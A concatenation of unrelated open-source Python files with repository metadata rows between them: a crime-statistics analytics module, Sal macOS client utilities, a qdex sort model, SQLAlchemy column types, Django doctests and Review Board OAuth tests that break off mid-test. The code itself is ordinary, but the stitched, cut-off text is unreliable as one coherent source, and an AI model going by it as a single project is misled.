if status_dict.get('negatives') is not None:
if status_dict['positives'] > status_dict['negatives']:
positive = True
else:
positive = True
# Now update total positives
if positive is True:
if entry_dict.get('total_positives') is None:
entry_dict['total_positives'] = 0
total_positives = int(entry_dict['total_positives']) + 1
entry_dict['total_positives'] = total_positives
# Now update total
if entry_dict.get('total_crimes') is None:
entry_dict['total_crimes'] = 0
total_crimes = int(entry_dict['total_crimes']) + 1
entry_dict['total_crimes'] = total_crimes
if entry_dict.get('status_crimes') is None:
entry_dict['status_crimes'] = []
# This is eating up all memory. Drop it
# entry_dict['status_crimes'].append({
# 'status_id_doc': status_dict['_metadata']['id_doc'],
# 'status_positives': status_dict.get('positives'),
# 'status_negatives': status_dict.get('negatives')
# })
# Now update total
if entry_dict.get('total_status') is None:
entry_dict['total_status'] = 0
total_status = int(entry_dict['total_status']) + 1
entry_dict['total_status'] = total_status
try:
result = self.update_document(id_doc, entry_dict)
except HTTPError as e:
log.error("Error updating status\n%s", e.message)
result = None
if result is None:
log.error("Error updating total status positives and negatives")
log.info("Processing finished %s", result)
return True
def process_response_categories(self, status_dict, id_doc):
# Get actual analytics
entry_dict = self.get_document(id_doc)
# Manually add id_doc
entry_dict['_metadata'] = dict()
entry_dict['_metadata']['id_doc'] = id_doc
# Check mandatory attributes on status
if status_dict is None:
log.debug("Empty status!!!")
return False
if status_dict.get('brasil_city') is None:
log.debug("Brasil City not found for status ID = %s", status_dict['_metadata']['id_doc'])
return False
if status_dict.get('category') is None:
log.debug("Category not found for status ID = %s", status_dict['_metadata']['id_doc'])
return False
if status_dict['category'].get('category_id_doc') is None:
log.debug("Category ID not found for status ID = %s", status_dict['_metadata']['id_doc'])
return False
# Now build statistics for the attributes
if entry_dict.get('state') is None:
entry_dict['state'] = list()
# Now try to find specific state
try:
uf = (item for item in entry_dict['state'] if item['state_uf'] == status_dict['brasil_city']['state_short_name']).next()
state_index = entry_dict['state'].index(uf)
# Now try to find category
try:
cat = (item for item in entry_dict['state'][state_index]['category'] if item['category_id_doc'] == status_dict['category']['category_id_doc']).next()
cat_index = entry_dict['state'][state_index]['category'].index(cat)
# Finally update category frequency
log.debug("Increasing count. Status = %s Category = %s", status_dict['_metadata']['id_doc'], status_dict['category']['category_id_doc'])
entry_dict['state'][state_index]['category'][cat_index]['category_status'] += 1
except StopIteration as e:
entry_dict['state'][state_index]['category'].append({
'category_id_doc': status_dict['category']['category_id_doc'],
'category_status': 1
})
except StopIteration as e:
# In this case there is no available
entry_dict['state'].append({
'state_uf': status_dict['brasil_city']['state_short_name'],
'category': [{
'category_id_doc': status_dict['category']['category_id_doc'],
'category_status': 1
}]
})
entry_dict['total_status'] += 1
# Finally update entry back on status
try:
result = self.update_document(id_doc, entry_dict)
except ConnectionError as e:
log.error("Error updating analytics id = %s\n%s", id_doc, e.message)
# Wait one second and try again
time.sleep(1)
result = self.process_response_categories(status_dict, id_doc)
except HTTPError as e:
log.error("Error updating status\n%s", e.message)
result = None
if result is None:
log.error("Error updating total status positives and negatives")
log.info("Processing finished %s", result)
return True
def get_latest_analysis(self, start_date, end_date=None):
"""
Get latest analysis on dates
:param start_date: Start date
:param end_date: End date
:return: Latest analysis JSON
"""
orderby = OrderBy(asc=['id_doc'])
select = ['*']
# Check if there are date filters
literal = None
if start_date is not None:
if end_date is None:
# Default to now
end_date = datetime.datetime.now()
# Use search by inclusion_datetime
literal = """analysis_date <= '%s'::date and
to_date(document->>'analysis_end_date'::text, 'YYYY-MM-DD HH24:MI:SS') <= '%s'::date """ % (
start_date.strftime("%Y-%m-%d"),
end_date.strftime("%Y-%m-%d")
)
else:
log.error("start_date must be supplied")
return None
search = Search(
select=select,
limit=None,
order_by=orderby,
literal=literal
)
url = self.documentrest.rest_url
url += "/" + self.lbbase._metadata.name + "/doc"
vars = {
'$$': search._asjson()
}
# Envia requisição para o REST
response = requests.get(url, params=vars)
response_json = response.json()
results = response_json['results']
if len(results) == 0:
return {}
else:
# Get only latest analysis
escolhido = dict()
for elm in results:
if not escolhido:
escolhido = elm
elif int(escolhido['_metadata']['id_doc']) < int(elm['_metadata']['id_doc']):
escolhido = elm
log.debug(results)
log.debug("Escolhido: %s", escolhido)
return escolhido
def get_state_analysis(self, start_date, end_date=None):
"""
Get state analysis
"""
analysis = self.get_latest_analysis(
start_date=start_date,
end_date=end_date
)
output = {
'total_status': analysis['total_status']
}
for state in analysis['state']:
for cat in state['category']:
if output.get(cat['category_id_doc']) is None:
output[cat['category_id_doc']] = dict()
output[cat['category_id_doc']][state['state_uf']] = cat['category_status']
return output
def create_analysis_categories(self,
start_date,
end_date=None,
offset=0):
"""
Create analysis for the training bases calculating total positives and negatives
:param start_date: Analysis start date
:param end_date: Analysis end date
:param offset: Starting offset
:return:
"""
task_queue = Queue()
done_queue = Queue()
processes = int(self.processes)
# Get end date
if end_date is None:
end_date = datetime.datetime.now()
# First create analysis
ana = Analytics(
analysis_date=start_date,
analysis_end_date=end_date,
total_status=0,
total_crimes=0,
status_crimes=[]
)
id_doc = ana.create_analytics()
if id_doc is None:
log.error("Error creating analysis")
return None
self.status_base.documentrest.response_object = False
# Now run on every status
id_document_list = self.status_base.get_document_ids(
offset=offset,
start_date=start_date,
end_date=end_date
)
for status_id_doc in id_document_list:
task_queue.put(status_id_doc)
for i in range(processes):
# Permite o processamento paralelo dos status
Process(target=self.worker_categories, args=(task_queue, done_queue)).start()
# Process responses
log.debug("Processing responses")
for i in range(len(id_document_list)):
status_dict = done_queue.get()
# Add retry loop if connection errors
try:
self.process_response_categories(
status_dict=status_dict,
id_doc=id_doc
)
except ConnectionError as e:
log.error("CONNECTION ERROR: connection error on %s\n%s", id_doc, e.message)
# Wait one second and retry
time.sleep(1)
self.process_response_categories(
status_dict=status_dict,
id_doc=id_doc
)
# Tell child processes to stop
for i in range(processes):
task_queue.put('STOP')
return id_doc
# Function run by worker processes
def worker_categories(self, inp, output):
for func in iter(inp.get, 'STOP'):
result = self.process_status_categories(func)
output.put(result)
def process_status_categories(self, status_id_doc):
"""
Process status
:param status_id_doc: Status id_doc
:return: Status dict stored
"""
try:
result = self.status_base.get_document(status_id_doc)
except ConnectionError as e:
log.error("CONNECTION ERROR: Error processing %s\n%s", status_id_doc, e.message)
# Try again in one second
time.sleep(1)
status_dict = self.process_status_categories(status_id_doc)
return status_dict
# JSON
status_dict = conv.document2dict(self.status_base.lbbase, result)
# Manually add id_doc
status_dict['_metadata'] = dict()
status_dict['_metadata']['id_doc'] = status_id_doc
return status_dict
def get_analysis(self, limit=10):
"""
Get analysis list
:param limit: Maximum results
:return: JSON with results
"""
orderby = OrderBy(desc=['id_doc'])
select = ['*']
search = Search(
select=select,
limit=limit,
order_by=orderby
)
url = self.documentrest.rest_url
url += "/" + self.lbbase._metadata.name + "/doc"
vars = {
'$$': search._asjson()
}
# Envia requisição para o REST
response = requests.get(url, params=vars)
response_json = response.json()
return response_json
analytics_base = AnalyticsBase()
class Analytics(analytics_base.metaclass):
"""
Classe que armazena eventos de crime
"""
def __init__(self, **args):
"""
Construct for social networks data
:return:
"""
super(Analytics, self).__init__(**args)
self.analytics_base = analytics_base
@property
def analysis_date(self):
"""
Inclusion date
:return:
"""
return analytics_base.metaclass.analysis_date.__get__(self)
@analysis_date.setter
def analysis_date(self, value):
"""
Inclusion date setter
"""
if isinstance(value, datetime.datetime):
value = value.strftime("%d/%m/%Y %H:%M:%S")
elif value is None:
value = datetime.datetime.now().strftime("%d/%m/%Y %H:%M:%S")
else:
# Try to format string
value = datetime.datetime.strptime(value, "%d/%m/%Y %H:%M:%S").strftime("%d/%m/%Y %H:%M:%S")
analytics_base.metaclass.analysis_date.__set__(self, value)
@property
def analysis_end_date(self):
"""
Inclusion date
:return:
"""
return analytics_base.metaclass.analysis_end_date.__get__(self)
@analysis_end_date.setter
def analysis_end_date(self, value):
"""
Inclusion date setter
"""
if isinstance(value, datetime.datetime):
value = value.strftime("%d/%m/%Y %H:%M:%S")
elif value is None:
value = datetime.datetime.now().strftime("%d/%m/%Y %H:%M:%S")
else:
# Try to format string
value = datetime.datetime.strptime(value, "%d/%m/%Y %H:%M:%S").strftime("%d/%m/%Y %H:%M:%S")
analytics_base.metaclass.analysis_end_date.__set__(self, value)
def analytics_to_dict(self):
"""
Convert analytics object to Python dict
:return: dict for crime
"""
return conv.document2dict(self.analytics_base.lbbase, self)
def analytics_to_json(self):
"""
Convert object to json
:return: JSON for crime
"""
return conv.document2json(self.analytics_base.lbbase, self)
def create_analytics(self):
"""
Insert document on base
:return: Document creation analytics
"""
document = self.analytics_to_json()
try:
result = self.analytics_base.documentrest.create(document)
except HTTPError, err:
log.error(err.strerror)
return None
return result
def update(self, id_doc):
"""
Update document
:param id_doc: Document ID
:return:
"""
document = self.analytics_to_json()
#print(document)
return self.analytics_base.documentrest.update(id=id_doc, document=document)
|
gpl-2.0
| 6,293,750,678,175,636,000 | 29.727384 | 165 | 0.536246 | false |
salopensource/sal-scripts
|
sal_python_pkg/sal/mac_utils.py
|
1
|
9065
|
import binascii
import datetime
import logging
import os
import pathlib
import subprocess
import time
from Foundation import (
kCFPreferencesAnyUser,
kCFPreferencesCurrentHost,
CFPreferencesSetValue,
CFPreferencesAppSynchronize,
CFPreferencesCopyAppValue,
CFPreferencesAppValueIsForced,
NSDate,
NSArray,
NSDictionary,
NSData,
NSNull,
)
from sal.client import get_sal_client, MacKeychainClient
BUNDLE_ID = "com.github.salopensource.sal"
ISO_TIME_FORMAT = "%Y-%m-%d %H:%M:%S %z"
def setup_sal_client():
ca_cert = sal_pref("CACert", "")
cert = sal_pref("SSLClientCertificate", "")
key = sal_pref("SSLClientKey", "")
exists = map(os.path.exists, (ca_cert, cert, key))
if any(exists):
if not all(exists):
logging.warning(
"Argument warning! If using the `CACert`, `SSLClientCertificate`, or "
"`SSLClientKey` prefs, they must all be either paths to cert files or the "
"common name of the certs to find in the keychain."
)
# If any of the above have been passed as a path, we have to
# use a vanilla Session.
logging.debug("Using SalClient")
client = get_sal_client()
else:
# Assume that any passed certs are by CN since they don't
# exist as files anywhere.
# If we're going to use the keychain, we need to use a
# macsesh
logging.debug("Using MacKeychainClient")
client = get_sal_client(MacKeychainClient)
if ca_cert:
client.verify = ca_cert
if cert:
client.cert = (cert, key) if key else cert
basic_auth = sal_pref("BasicAuth")
if basic_auth:
key = sal_pref("key", "")
client.auth = ("sal", key)
client.base_url = sal_pref("ServerURL")
def mac_pref(domain, key, default=None):
val = CFPreferencesCopyAppValue(key, domain)
return val if val is not None else default
def set_sal_pref(pref_name, pref_value):
"""Sets a Sal preference.
The preference file on disk is located at
/Library/Preferences/com.github.salopensource.sal.plist. This should
normally be used only for 'bookkeeping' values; values that control
the behavior of munki may be overridden elsewhere (by MCX, for
example)
"""
try:
CFPreferencesSetValue(
pref_name,
pref_value,
BUNDLE_ID,
kCFPreferencesAnyUser,
kCFPreferencesCurrentHost,
)
CFPreferencesAppSynchronize(BUNDLE_ID)
except Exception:
pass
def sal_pref(pref_name, default=None):
"""Return a preference value.
Since this uses CFPreferencesCopyAppValue, Preferences can be defined
several places. Precedence is:
- MCX
- /var/root/Library/Preferences/com.github.salopensource.sal.plist
- /Library/Preferences/com.github.salopensource.sal.plist
- default_prefs defined here.
Returned values are all converted to native python types through the
`unobjctify` function; e.g. dates are returned as aware-datetimes,
NSDictionary to dict, etc.
"""
default_prefs = {
"ServerURL": "http://sal",
"osquery_launchd": "com.facebook.osqueryd.plist",
"SkipFacts": [],
"SyncScripts": True,
"BasicAuth": True,
"GetGrains": False,
"GetOhai": False,
"LastRunWasOffline": False,
"SendOfflineReport": False,
}
pref_value = mac_pref(BUNDLE_ID, pref_name, default)
if pref_value is None and pref_name in default_prefs:
# If we got here, the pref value was either set to None or never
# set, AND the default was also None. Fall back to auto prefs.
pref_value = default_prefs.get(pref_name)
# we're using a default value. We'll write it out to
# /Library/Preferences/<BUNDLE_ID>.plist for admin
# discoverability
set_sal_pref(pref_name, pref_value)
return unobjctify(pref_value)
def forced(pref, bundle_identifier=BUNDLE_ID):
return CFPreferencesAppValueIsForced(pref, bundle_identifier)
def prefs_report():
prefs = (
"ServerURL",
"key",
"BasicAuth",
"SyncScripts",
"SkipFacts",
"CACert",
"SendOfflineReport",
"SSLClientCertificate",
"SSLClientKey",
"MessageBlacklistPatterns",
)
return {k: {"value": sal_pref(k), "forced": forced(k)} for k in prefs}
def unobjctify(element, safe=False):
"""Recursively convert nested elements to native python datatypes.
Types accepted include str, bytes, int, float, bool, None, list,
dict, set, tuple, NSArray, NSDictionary, NSData, NSDate, NSNull.
element: Some (potentially) nested data you want to convert.
safe: Bool (defaults to False) whether you want printable
representations instead of the python equivalent. e.g. NSDate
safe=True becomes a str, safe=False becomes a datetime.datetime.
NSData safe=True bcomes a hex str, safe=False becomes bytes. Any
type not explicitly handled by this module will raise an
exception unless safe=True, where it will instead replace the
data with a str of '<UNSUPPORTED TYPE>'
This is primarily for safety in serialization to plists or
output.
returns: Python equivalent of the original input.
e.g. NSArray -> List, NSDictionary -> Dict, etc.
raises: ValueError for any data that isn't supported (yet!) by this
function.
"""
supported_types = (str, bytes, int, float, bool, datetime.datetime)
if isinstance(element, supported_types):
return element
elif isinstance(element, (dict, NSDictionary)):
return {k: unobjctify(v, safe=safe) for k, v in element.items()}
elif isinstance(element, (list, NSArray)):
return [unobjctify(i, safe=safe) for i in element]
elif isinstance(element, set):
return {unobjctify(i, safe=safe) for i in element}
elif isinstance(element, tuple):
return tuple([unobjctify(i, safe=safe) for i in element])
elif isinstance(element, NSData):
return binascii.hexlify(element) if safe else bytes(element)
elif isinstance(element, NSDate):
return (
str(element)
if safe
else datetime.datetime.strptime(element.description(), ISO_TIME_FORMAT)
)
elif isinstance(element, NSNull) or element is None:
return "" if safe else None
elif safe:
return "<UNSUPPORTED TYPE>"
raise ValueError(f"Element type '{type(element)}' is not supported!")
def script_is_running(scriptname):
"""Returns Process ID for a running python script.
Not at all stolen from Munki. Honest.
"""
cmd = ["/bin/ps", "-eo", "pid=,command="]
proc = subprocess.Popen(
cmd, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
out, _ = proc.communicate()
mypid = os.getpid()
for line in out.splitlines():
try:
pid, process = line.split(maxsplit=1)
except ValueError:
# funky process line, so we'll skip it
pass
else:
args = process.split()
try:
# first look for Python processes
if "MacOS/Python" in args[0] or "python" in args[0]:
# look for first argument being scriptname
if scriptname in args[1]:
try:
if int(pid) != mypid:
return True
except ValueError:
# pid must have some funky characters
pass
except IndexError:
pass
# if we get here we didn't find a Python script with scriptname
# (other than ourselves)
return False
def run_scripts(dir_path, cli_args=None, error=False):
results = []
skip_names = {"__pycache__"}
scripts = (p for p in pathlib.Path(dir_path).iterdir() if p.name not in skip_names)
for script in scripts:
if not os.access(script, os.X_OK):
results.append(f"'{script}' is not executable or has bad permissions")
continue
cmd = [script]
if cli_args:
cmd.append(cli_args)
try:
subprocess.check_call(cmd)
results.append(f"'{script}' ran successfully")
except (OSError, subprocess.CalledProcessError):
errormsg = f"'{script}' had errors during execution!"
if not error:
results.append(errormsg)
else:
raise RuntimeError(errormsg)
return results
def wait_for_script(scriptname, repeat=3, pause=1):
"""Tries a few times to wait for a script to finish."""
count = 0
while count < repeat:
if script_is_running(scriptname):
time.sleep(pause)
count += 1
else:
return False
return True
|
apache-2.0
| -577,093,192,578,006,400 | 31.725632 | 91 | 0.615996 | false |
encukou/qdex
|
qdex/sortmodel.py
|
1
|
4407
|
#!/usr/bin/env python
# Encoding: UTF-8
"""Part of qdex: a Pokédex using PySide and veekun's pokedex library.
A sort clause model
"""
from PySide import QtCore, QtGui
Qt = QtCore.Qt
from qdex.querybuilder import QueryBuilder
class ColumnIndices(object):
name = 0
order = 1
_count = 2
class SortModel(QtCore.QAbstractItemModel):
"""A model that keeps track of sort criteria
"""
collapsingPossible = False
_pagesize = 1000
def __init__(self, queryModel, clauses):
super(SortModel, self).__init__()
self.clauses = clauses
self.queryModel = queryModel
self.g = queryModel.g
self.g.registerRetranslate(self.allDataChanged)
def allDataChanged(self):
"""Called when all of the data is changed, e.g. retranslated"""
self.dataChanged.emit(
self.index(0, 0),
self.index(self.rowCount() - 1, self.columnCount() - 1),
)
self.headerDataChanged.emit(Qt.Horizontal, 0, self.columnCount() - 1)
def columnCount(self, parent=QtCore.QModelIndex()):
if parent.isValid():
return 0
else:
return ColumnIndices._count
def data(self, index, role=Qt.DisplayRole):
clause = self.clauses[index.row()]
if role == Qt.UserRole:
return clause
if index.column() == ColumnIndices.name:
column = clause.column
if column:
return column.headerData(role, self.queryModel)
else:
if role == Qt.DisplayRole:
return clause.name
elif index.column() == ColumnIndices.order:
if role == Qt.DisplayRole:
if clause.descending:
return u'↑'
else:
return u'↓'
def index(self, row, column=0, parent=QtCore.QModelIndex()):
if isinstance(row, int):
if not parent.isValid():
if 0 <= row < self.rowCount() and 0 <= column < self.columnCount():
return self.createIndex(row, column)
else:
return self.clauses.index(row)
def rowCount(self, parent=QtCore.QModelIndex()):
if parent.isValid():
return 0
else:
return len(self.clauses)
def parent(self, index):
return QtCore.QModelIndex()
def clear(self):
while self.clauses:
del self[len(self) - 1]
# List-like methods
def __iter__(self): return iter(self.clauses)
def __getitem__(self, i): return self.clauses[i]
def __len__(self): return len(self.clauses)
def append(self, clause):
builder = QueryBuilder(self.queryModel.baseQuery,
self.queryModel.mappedClass)
# Remove overridden clauses
while True:
# To prevent problems with list index reordering, we remove one
# clause at a time.
for i, existingClause in enumerate(self.clauses):
if existingClause.overrides(clause, builder):
del self[i]
break
else:
# All overridden clauses removed; add the new one
self.beginInsertRows(QtCore.QModelIndex(),
len(self.clauses), len(self.clauses))
self.clauses.append(clause)
self.endInsertRows()
return
def __setitem__(self, index, clause):
self.clauses[index] = clause
self.dataChanged.emit(self.index(index, 0),
self.index(index, self.columnCount() - 1))
def __delitem__(self, index):
self.beginRemoveRows(QtCore.QModelIndex(), index, index)
del self.clauses[index]
self.endRemoveRows()
def replace(self, old, new):
self[self.clauses.index(old)] = new
def remove(self, clause):
del self[self.clauses.index(clause)]
def increase_priority(self, clause, amount=1):
index = self.clauses.index(clause)
del self[index]
index += amount
if index < 0: index = 0
if index >= len(self): index = len(self)
self.beginInsertRows(QtCore.QModelIndex(), index, index)
self.clauses.insert(index, clause)
self.endInsertRows()
def decrease_priority(self, clause, amount=1):
self.increase_priority(clause, -amount)
|
mit
| -1,209,521,007,371,778,800 | 30.898551 | 83 | 0.575875 | false |
gmr/apiary
|
apiary/types.py
|
1
|
4503
|
"""
Definition of additional SQLAlchemy types
"""
import json
import logging
from sqlalchemy.dialects import mysql
from sqlalchemy.dialects import postgres
from sqlalchemy import types
import ipaddr
import re
import uuid
LOGGER = logging.getLogger(__name__)
def is_ipv4_address(value):
try:
ipaddr.IPv4Address(value)
except ipaddr.AddressValueError:
return False
return True
def is_ipv6_address(value):
try:
ipaddr.IPv6Address(value)
except ipaddr.AddressValueError:
return False
return True
class IPAddress(types.TypeDecorator):
"""Abstract the IP address so it uses PostgreSQL's inet type or Text"""
impl = types.TEXT
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgres.INET())
return dialect.type_descriptor(types.CHAR(45))
def process_bind_param(self, value, dialect):
if value and not is_ipv4_address(value) and not is_ipv6_address(value):
raise ValueError('Could not validate IPv4 or IPv6 format: %s',
value)
return value
class IPv4Address(types.TypeDecorator):
"""Abstract the IP address so it uses PostgreSQL's inet type or Text"""
impl = types.TEXT
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgres.INET())
return dialect.type_descriptor(types.CHAR(15))
def process_bind_param(self, value, dialect):
if value and not is_ipv4_address(value):
raise ValueError('Could not validate IPv4 format: %s', value)
return value
class IPv6Address(types.TypeDecorator):
"""Abstract the IP address so it uses PostgreSQL's inet type or Text"""
impl = types.TEXT
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgres.INET())
return dialect.type_descriptor(types.CHAR(45))
def process_bind_param(self, value, dialect):
if value and not is_ipv6_address(value):
raise ValueError('Could not validate IPv6 format: %s', value)
return value
class MacAddress(types.TypeDecorator):
"""Abstract the IP address so it uses PostgreSQL's macaddr type or Text"""
impl = types.TEXT
PATTERN = re.compile(r'^([0-9A-F]{2}[:-]){5}([0-9A-F]{2})$')
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgres.MACADDR())
return dialect.type_descriptor(types.CHAR(17))
def process_bind_param(self, value, dialect):
if value and not self.PATTERN.match(value):
raise ValueError('Could not validate MAC Address format: %s', value)
return value
class JSONEncodedValue(types.TypeDecorator):
"""Represents an immutable structure as a json-encoded string from
SQLAlchemy doc example
Usage::
JSONEncodedValue()
"""
impl = types.TEXT
def process_bind_param(self, value, dialect):
if value is not None:
value = json.dumps(value)
return value
def process_result_value(self, value, dialect):
if value is not None:
value = json.loads(value)
return value
class UUID(types.TypeDecorator):
"""UUID column type for SQLAlchemy based on SQLAlchemy doc examples for GUID
and an example from Tom Willis for MySQL:
http://blog.sadphaeton.com/2009/01/19/sqlalchemy-recipeuuid-column.html
"""
impl = types.TEXT
def load_dialect_impl(self, dialect):
if dialect.name == 'mysql':
return dialect.type_descriptor(mysql.MSBinary)
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgres.UUID())
else:
return dialect.type_descriptor(types.CHAR(32))
def process_bind_param(self, value, dialect=None):
if not value:
return None
if isinstance(value, uuid.UUID):
if dialect.name == 'mysql':
return value.bytes
elif dialect.name == 'postgresql':
return str(value)
else:
return str(value)
return str(uuid.UUID('urn:uuid:%s' % value))
def process_result_value(self, value, dialect=None):
if value:
return uuid.UUID(value)
return None
def is_mutable(self):
return False
|
bsd-3-clause
| 8,459,731,531,724,355,000 | 28.24026 | 80 | 0.641572 | false |
hugs/django
|
tests/modeltests/get_or_create/models.py
|
1
|
1805
|
"""
33. get_or_create()
``get_or_create()`` does what it says: it tries to look up an object with the
given parameters. If an object isn't found, it creates one with the given
parameters.
"""
from django.db import models
class Person(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
birthday = models.DateField()
def __unicode__(self):
return u'%s %s' % (self.first_name, self.last_name)
__test__ = {'API_TESTS':"""
# Acting as a divine being, create an Person.
>>> from datetime import date
>>> p = Person(first_name='John', last_name='Lennon', birthday=date(1940, 10, 9))
>>> p.save()
# Only one Person is in the database at this point.
>>> Person.objects.count()
1
# get_or_create() a person with similar first names.
>>> p, created = Person.objects.get_or_create(first_name='John', last_name='Lennon', defaults={'birthday': date(1940, 10, 9)})
# get_or_create() didn't have to create an object.
>>> created
False
# There's still only one Person in the database.
>>> Person.objects.count()
1
# get_or_create() a Person with a different name.
>>> p, created = Person.objects.get_or_create(first_name='George', last_name='Harrison', defaults={'birthday': date(1943, 2, 25)})
>>> created
True
>>> Person.objects.count()
2
# If we execute the exact same statement, it won't create a Person.
>>> p, created = Person.objects.get_or_create(first_name='George', last_name='Harrison', defaults={'birthday': date(1943, 2, 25)})
>>> created
False
>>> Person.objects.count()
2
# If you don't specify a value or default value for all required fields, you
# will get an error.
>>> p, created = Person.objects.get_or_create(first_name='Tom', last_name='Smith')
Traceback (most recent call last):
...
IntegrityError:...
"""}
|
bsd-3-clause
| 8,306,876,578,060,972,000 | 29.083333 | 130 | 0.684765 | false |
reviewboard/reviewboard
|
reviewboard/oauth/tests.py
|
2
|
25500
|
"""Tests for OAuth2 Applications."""
from __future__ import unicode_literals
from django.contrib.auth.models import AnonymousUser, User
from django.core.urlresolvers import reverse
from django.core.exceptions import ValidationError
from django.forms.models import model_to_dict
from djblets.testing.decorators import add_fixtures
from reviewboard.oauth.forms import (ApplicationChangeForm,
ApplicationCreationForm,
UserApplicationChangeForm,
UserApplicationCreationForm)
from reviewboard.oauth.models import Application
from reviewboard.site.models import LocalSite
from reviewboard.testing import TestCase
class ApplicationTests(TestCase):
"""Tests for Application."""
fixtures = ['test_users']
def test_is_accessible_by_with_anonymous(self):
"""Testing Application.is_accessible_by with anonyomus user"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user=user)
self.assertFalse(application.is_accessible_by(AnonymousUser()))
def test_is_accessible_by_with_owner(self):
"""Testing Application.is_accessible_by with owner"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user=user)
self.assertTrue(application.is_accessible_by(user))
def test_is_accessible_by_with_other_user(self):
"""Testing Application.is_accessible_by with other user"""
user = User.objects.get(username='doc')
other_user = User.objects.get(username='dopey')
application = self.create_oauth_application(user=user)
self.assertFalse(application.is_accessible_by(other_user))
def test_is_accessible_by_with_superuser(self):
"""Testing Application.is_accessible_by with superuser"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='admin')
application = self.create_oauth_application(user=user)
self.assertTrue(application.is_accessible_by(admin))
def test_is_accessible_by_with_local_site_and_owner(self):
"""Testing Application.is_accessible_by with LocalSite and owner"""
user = User.objects.get(username='doc')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertTrue(application.is_accessible_by(user,
local_site=local_site))
def test_is_accessible_by_with_local_site_and_other_user(self):
"""Testing Application.is_accessible_by with LocalSite and other user
"""
user = User.objects.get(username='doc')
other_user = User.objects.get(username='dopey')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user, other_user)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertFalse(application.is_accessible_by(other_user,
local_site=local_site))
def test_is_accessible_by_with_local_site_and_admin(self):
"""Testing Application.is_accessible_by with LocalSite and LocalSite
administrator
"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='dopey')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user, admin)
local_site.admins.add(admin)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertTrue(application.is_accessible_by(admin,
local_site=local_site))
def test_is_accessible_by_with_local_site_and_other_site_admin(self):
"""Testing Application.is_accessible_by with LocalSite and other
LocalSite administrator
"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='dopey')
local_site1 = LocalSite.objects.create(name='site1')
local_site1.users.add(user)
local_site2 = LocalSite.objects.create(name='site2')
local_site2.users.add(admin)
local_site2.admins.add(admin)
application = self.create_oauth_application(user=user,
local_site=local_site1)
self.assertFalse(application.is_accessible_by(admin,
local_site=local_site1))
def test_is_mutable_by_with_anonymous(self):
"""Testing Application.is_mutable_by with anonyomus user"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user=user)
self.assertFalse(application.is_mutable_by(AnonymousUser()))
def test_is_mutable_by_with_owner(self):
"""Testing Application.is_mutable_by with owner"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user=user)
self.assertTrue(application.is_mutable_by(user))
def test_is_mutable_by_with_other_user(self):
"""Testing Application.is_mutable_by with other user"""
user = User.objects.get(username='doc')
other_user = User.objects.get(username='dopey')
application = self.create_oauth_application(user=user)
self.assertFalse(application.is_mutable_by(other_user))
def test_is_mutable_by_with_superuser(self):
"""Testing Application.is_mutable_by with superuser"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='admin')
application = self.create_oauth_application(user=user)
self.assertTrue(application.is_mutable_by(admin))
def test_is_mutable_by_with_local_site_and_owner(self):
"""Testing Application.is_mutable_by with LocalSite and owner"""
user = User.objects.get(username='doc')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertTrue(application.is_mutable_by(user,
local_site=local_site))
def test_is_mutable_by_with_local_site_and_other_user(self):
"""Testing Application.is_mutable_by with LocalSite and other user
"""
user = User.objects.get(username='doc')
other_user = User.objects.get(username='dopey')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user, other_user)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertFalse(application.is_mutable_by(other_user,
local_site=local_site))
def test_is_mutable_by_with_local_site_and_admin(self):
"""Testing Application.is_mutable_by with LocalSite and LocalSite
administrator
"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='dopey')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user, admin)
local_site.admins.add(admin)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertTrue(application.is_mutable_by(admin,
local_site=local_site))
def test_is_mutable_by_with_local_site_and_other_site_admin(self):
"""Testing Application.is_mutable_by with LocalSite and other
LocalSite administrator
"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='dopey')
local_site1 = LocalSite.objects.create(name='site1')
local_site1.users.add(user)
local_site2 = LocalSite.objects.create(name='site2')
local_site2.users.add(admin)
local_site2.admins.add(admin)
application = self.create_oauth_application(user=user,
local_site=local_site1)
self.assertFalse(application.is_mutable_by(admin,
local_site=local_site1))
class ApplicationChangeFormTests(TestCase):
"""Tests for the ApplicationChangeForm."""
fixtures = ['test_users']
def test_reassign_client_id(self):
"""Testing ApplicationChangeForm cannot re-assign client_id"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user)
original_id = application.client_id
form = ApplicationChangeForm(
data=dict(
model_to_dict(
instance=application,
fields=ApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret')
),
client_id='foo',
),
instance=application,
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.client_id, original_id)
def test_reassign_client_secret(self):
"""Testing ApplicationChangeForm cannot re-assign client_secret"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user)
original_secret = application.client_secret
form = ApplicationChangeForm(
data=dict(
model_to_dict(
instance=application,
fields=ApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret')
),
client_secret='bar',
),
instance=application,
)
form.is_valid()
self.assertTrue(form.is_valid())
application = form.save()
